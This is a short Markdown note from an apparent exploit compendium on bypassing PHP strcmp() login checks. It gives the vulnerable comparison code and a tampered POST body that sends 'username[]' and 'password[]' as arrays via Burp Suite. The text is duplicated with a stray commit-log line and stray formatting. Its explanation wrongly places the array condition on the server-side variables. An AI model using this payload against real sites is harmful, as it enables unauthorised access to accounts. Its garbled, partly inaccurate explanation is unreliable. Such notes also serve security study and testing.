killchain-compendium/Exploits/Web/PHP strcmp.md

# PHP strcmp() bypass

Given a `strcmp()` of a variable and a POST parameter value that looks like this
```php
[...]
if (strcmp($username, $_POST['username']) == 0) {
    if (strcmp($password, $_POST['password']) == 0) {   
[...]
```

If `$username` and `$password` are an array, sending a POST value as an array too will evaluate both `strcmp()` to 0.
Using a Burpsuite Proxy, intercepting the HTTP request and changing the POST parameters from
```http
username=admin&password=admin
```

to
```http
username[]=admin&password[]=admin
```
smb exploit 2022-12-29 01:37:26 +01:00			`# PHP strcmp() bypass`

			Given a `strcmp()` of a variable and a POST parameter value that looks like this
			```php
			`[...]`
			`if (strcmp($username, $_POST['username']) == 0) {`
			`if (strcmp($password, $_POST['password']) == 0) {`
			`[...]`
			```

			If `$username` and `$password` are an array, sending a POST value as an array too will evaluate both `strcmp()` to 0.
			`Using a Burpsuite Proxy, intercepting the HTTP request and changing the POST parameters from`
			```http
			`username=admin&password=admin`
			```

			`to`
			```http
			`username[]=admin&password[]=admin`
			```